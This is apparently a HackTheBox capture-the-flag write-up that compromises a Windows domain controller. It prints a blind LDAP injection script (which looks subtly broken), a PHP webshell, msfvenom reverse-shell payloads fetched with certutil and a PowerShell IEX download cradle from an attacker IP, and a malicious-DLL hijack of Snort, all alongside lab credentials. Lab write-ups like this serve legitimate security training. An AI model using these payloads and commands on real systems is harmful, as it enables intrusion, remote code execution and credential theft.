HTB: analysis Writeup

Machine Information

Machine Rating

⭐⭐⭐⭐☆ (8.0/10)

Difficulty Assessment:

• Enumeration: ⭐⭐⭐⭐☆
• Real-world: ⭐⭐⭐⭐☆
• CVE: ⭐⭐⭐☆☆
• CTF-like: ⭐⭐⭐⭐☆

Summary

analysis is a Hard-difficulty Windows machine running as a Domain Controller in an Active Directory environment. The exploitation path involves DNS and web enumeration to discover subdomains, exploiting an LDAP injection vulnerability to extract credentials, uploading a PHP webshell for initial access, credential discovery in configuration files, lateral movement using alternate credentials, and finally privilege escalation through Snort DLL hijacking to achieve system-level access.

TL;DR: Reconnaissance → LDAP Injection → Webshell Access → Credential Extraction → Lateral Movement → DLL Hijacking → SYSTEM.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.129.51.235

Results:

Service Enumeration

Hostname: analysis.htb

Domain: analysis.htb (Active Directory environment)

Host: DC-ANALYSIS (Domain Controller)

Subdomains Discovered:

• www.analysis.htb
• internal.analysis.htb
• gc._msdcs.analysis.htb
• domaindnszones.analysis.htb
• forestdnszones.analysis.htb

echo "10.129.51.235 analysis.htb" >> /etc/hosts

DNS Enumeration with gobuster:

gobuster dns -d analysis.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -i

Directory Enumeration on internal.analysis.htb:

gobuster dir -u http://internal.analysis.htb/dashboard -w /usr/share/wordlists/dirb/common.txt

Initial Foothold

Step 1: User Enumeration with kerbrute

kerbrute userenum --dc 10.129.51.235 -d analysis.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Users Discovered:

• jdoe@analysis.htb
• technician@analysis.htb
• ajohnson@analysis.htb

Step 2: LDAP Injection Vulnerability

The endpoint /users/list.php on internal.analysis.htb contains a blind LDAP injection vulnerability.

Vulnerable Parameter: User input is unsanitized in LDAP queries.

Exploitation Script:

#!/usr/bin/env python3
import requests
import string

target = "http://internal.analysis.htb/users/list.php"
charset = string.ascii_letters + string.digits + "!@#$%^&*()"

def check_char(char):
    payload = f"*))(&(|(cn=*{char}*"
    response = requests.get(target, params={"search": payload})
    return "technician" in response.text or len(response.text) > expected_length

# Blind LDAP injection to extract technician password
password = ""
for pos in range(20):
    for char in charset:
        if check_char(char):
            password += char
            print(f"[+] Found: {password}")
            break

Credentials Extracted:

technician@analysis.htb : 97NTtl*4QP96Bv

Step 3: Dashboard Access

Navigate to http://internal.analysis.htb/employees/login.php and log in with technician credentials.

curl -X POST http://internal.analysis.htb/employees/login.php \
  -d "username=technician&password=97NTtl*4QP96Bv"

The dashboard reveals a “SOC Report” section that allows file uploads.

Step 4: PHP Webshell Upload

Create a malicious PHP file:

<?php
system($_GET['cmd']);
?>

Upload the PHP file through the dashboard upload form. The file is stored in /dashboard/uploads/.

Step 5: Access Webshell

curl "http://internal.analysis.htb/dashboard/uploads/webshell.php?cmd=whoami"

Output: analysis\iis apppool\defaultapppool

Step 6: Establish Reverse Shell

Generate a meterpreter payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.56 LPORT=4444 -f exe -o exp.exe

Download the payload on the target:

certutil -urlcache -f http://10.10.14.56:8080/exp.exe %temp%\exp.exe

Execute and establish meterpreter session:

msfconsole -r handler.rc

User Compromise

Step 1: Credential Discovery in Configuration Files

Navigate to the web application directory and examine the LDAP binding credentials:

type C:\inetpub\internal\users\list.php

Credentials Found in Source Code:

webservice@analysis.htb : N1G6G46G@G!j

Step 2: Lateral Movement with webservice Account

Use RunasCS to execute commands as the webservice user:

runascs.exe "analysis\webservice" "N1G6G46G@G!j" "powershell.exe -Command IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.56/ps.ps1')"

Step 3: Privilege Escalation Check

Run PrivescCheck to identify further escalation paths:

. .\PrivescCheck.ps1
Invoke-PrivescCheck

Output reveals additional credentials:

jdoe : 7y4Z4^*y9Zzj (Domain: analysis.htb)

Step 4: Access as jdoe

Use evil-winrm to authenticate as jdoe:

evil-winrm -u "jdoe" -i "analysis.htb" -p "7y4Z4^*y9Zzj"

User Flag

type C:\Users\jdoe\Desktop\user.txt

🚩 User Flag: <REDACTED>

Privilege Escalation

Enumeration

whoami /priv
net user
systeminfo
Get-Process
tasklist /svc

Vulnerability: Snort DLL Hijacking

Snort is installed on the system with a DLL search order vulnerability:

Get-ChildItem "C:\snort\lib\snort_dynamicpreprocessor"

The Snort service loads DLLs from C:\snort\lib\snort_dynamicpreprocessor\ directory. If we can replace or add a malicious DLL before Snort loads it, we can achieve code execution as SYSTEM.

Exploitation Steps

1. Generate Malicious DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.56 LPORT=4444 -f dll -o sf_engine.dll

2. Replace Legitimate DLL:

Copy the malicious DLL to the Snort directory:

Copy-Item "C:\temp\sf_engine.dll" "C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll" -Force

3. Wait for Snort to Load the DLL:

Snort runs as a scheduled service or on system startup. Once the service restarts or is triggered, it will load our malicious DLL.

4. Obtain SYSTEM Shell:

Set up a listener and wait for the callback:

msfconsole -r handler.rc

Once Snort loads the malicious DLL, we receive a meterpreter session with SYSTEM privileges.

Root Flag

type C:\Users\Administrator\Desktop\root.txt

🚩 Root Flag: <REDACTED>

Attack Chain Summary

graph TD
    A["Reconnaissance<br/>nmap + gobuster DNS"] --> B["User Enumeration<br/>kerbrute"]
    B --> C["LDAP Injection Attack<br/>/users/list.php"]
    C --> D["Extract technician Credentials<br/>technician:97NTtl*4QP96Bv"]
    D --> E["Dashboard Access<br/>internal.analysis.htb/employees/login.php"]
    E --> F["PHP Webshell Upload<br/>SOC Report Feature"]
    F --> G["Initial Shell Access<br/>webshell.php cmd execution"]
    G --> H["Meterpreter Reverse Shell<br/>msfvenom + certutil"]
    H --> I["Credential Discovery<br/>webservice:N1G6G46G@G!j from list.php"]
    I --> J["Lateral Movement<br/>RunasCS to webservice account"]
    J --> K["PrivescCheck Enumeration<br/>Find jdoe credentials"]
    K --> L["Access as jdoe<br/>evil-winrm authentication"]
    L --> M["Snort DLL Hijacking<br/>Replace sf_engine.dll"]
    M --> N["SYSTEM Privilege Escalation<br/>Meterpreter as SYSTEM"]

Tools Used

Key Learnings

• Active Directory Enumeration: DNS and subdomain enumeration are critical for discovering hidden web applications in AD environments.
• LDAP Injection: User input in LDAP queries must be properly sanitized to prevent blind injection attacks that leak credentials.
• Web Application Vulnerabilities: File upload features without proper validation can directly compromise the system when combined with web server execution.
• Credential Extraction: Configuration files, source code, and database connections often store plaintext credentials used by service accounts.
• Lateral Movement: Once you have valid credentials, use tools like RunasCS and evil-winrm to pivot across the domain.
• DLL Hijacking: Improperly secured application directories with weak file permissions allow DLL replacement attacks for privilege escalation.
• Privilege Escalation Path: Misconfigurations in installed services (like Snort) can lead to SYSTEM-level code execution through DLL search order hijacking.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Windows #Hard